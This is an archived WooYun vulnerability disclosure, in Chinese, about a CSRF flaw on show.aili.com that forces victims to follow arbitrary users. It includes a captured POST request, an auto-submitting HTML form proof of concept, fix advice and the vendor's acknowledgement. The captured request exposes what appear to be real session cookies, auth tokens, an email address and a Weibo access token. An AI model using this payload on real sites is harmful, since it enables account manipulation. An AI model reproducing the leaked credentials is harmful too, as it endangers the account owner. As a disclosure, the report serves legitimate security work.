乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-25: 细节已通知厂商并且等待厂商处理中 2013-10-25: 厂商已经确认,细节仅向厂商公开 2013-11-04: 细节向核心白帽子及相关领域专家公开 2013-11-14: 细节向普通白帽子公开 2013-11-24: 细节向实习白帽子公开 2013-12-09: 细节向公众公开
http://show.aili.com/index.php?m=content&c=goods&a=goodsShow&gid=5071273无限评论
任意关注csrf抓包数据:
POST /index.php?m=content&c=goods&a=addAttention HTTP/1.1Host: show.aili.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://show.aili.com/index.php?m=content&c=goods&a=myhome&uid=1Content-Length: 10Cookie: BAIDU_CLB_REFER=http%3A%2F%2Fwww.baidu.com%2Fs%3Fword%3Dailiwang%26tn%3D82013038_103_hao_pg%26ie%3Dutf-8; Hm_lvt_7042ea0b321a91ea599a6d16b48f9a6b=1379719929; Hm_lpvt_7042ea0b321a91ea599a6d16b48f9a6b=1379728848; mid=523cd976ad8b7; __utma=1.1351935822.1379727729.1379727729.1379727729.1; __utmc=1; __utmz=1.1379727729.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); auth=6a59cuoNNYMcu3DnYUrRqaGQduA5sSuqNRKdzHlrCbT0P4RPDhiBR9dyxV7jm7dzay8UvkYgQx9cPdauYeLErnvbIO%2BUe4%2FjBX52ru7%2FIDz95EDm7xKqQQSrFzj6Eh6LdRj0x1yzti69FpWWGgFjl0Sk%2Blg3WJsfQduSpGqlkddQMCk; username=%26%2350%3B%26%2353%3B%26%2355%3B%26%2352%3B%26%2352%3B%26%2353%3B%26%2353%3B%26%2357%3B%26%2353%3B%26%2357%3B; asffd=2574455959; uid=1061171; avatar=http%3A%2F%2Fspace.aili.com%2Fuc_server%2Favatar.php%3Fuid%3D1061171%26size%3Dmiddle%26r%3D81384; integration=0; reportnum=0; report=0; 1061171email=2574455959%40qq.com; 1061171storearcnum=0; 1061171storepicnum=0; history=22648%2C22647%2C22643%2C23595%2C23593; __utmb=1.24.10.1379727729; lzstat_uv=11399191941278091788|2769764; lzstat_ss=2861658854_2_1379752035_2769764; CNZZDATA30020763=cnzz_eid%3D411560464-1379719844-http%253A%252F%252Fshow.aili.com%26ntime%3D1379725249%26cnzz_a%3D54%26retime%3D1379728847484%26sin%3Dnone%26ltime%3D1379728847484%26rtime%3D0; CNZZDATA30059587=cnzz_eid%3D1936712058-1379724330-http%253A%252F%252Fshow.aili.com%26ntime%3D1379724330%26cnzz_a%3D54%26retime%3D1379728847492%26sin%3Dnone%26ltime%3D1379728847492%26rtime%3D0; timestamp=1379728339000; sign=5A51DA1B4CFFB18EFB6359A40696A9C5; PHPSESSID=78e1e595675282700f619b886eadb47f; bArEe__realname=4f74AwkGAglSBgQEVFIBCgBQBQFQBwdeCgZaDgmEg5yE0urVpLg; weibojs_3917973109=access_token%3D2.00eWNuJEfm6JRE135af771150juxvz%26remind_in%3D666250%26expires_in%3D666250%26uid%3D3810916716; bArEe_auth=704bBFFRBQAJAAkDBFVXAFcGXAVcVghSCwFXXAFSAwQHcApiMjRZem5xVWp%2BZlQhKnU0W3N2cCthMENAWiRyUyBwCnEgNmN2a3NOahs; bArEe__userid=704bBFFRBQAJAAkDBFdSBlMBVVoOAAZWVlVWDQBdCwRRC1Q; bArEe__username=704bBFFRBQAJAAkDBFFSU1YAAAcKBFJTUl0DWw4UAghcClUDWFgH; bArEe____uname=%26%23113%3B%26%2349%3B%26%2356%3B%26%2357%3B%26%2356%3B%26%2351%3B%26%2355%3B%26%2357%3B%26%2357%3B%26%2350%3BConnection: keep-alivePragma: no-cacheCache-Control: no-cachetouserid=1
构造poc:
<html><body><form id="csrf" name="csrf" action="http://show.aili.com/index.php?m=content&c=goods&a=addAttention" method="POST"><input type="text" name="touserid" value="1" /><input type="submit" value="submit"></form><script> document.csrf.submit();</script></body></html>
1:乌云知识库看下2:加个验证码
危害等级:中
漏洞Rank:9
确认时间:2013-10-25 11:09
感谢白帽,此洞必补,程序猿要加油,再不努力,就要打屁屁了
暂无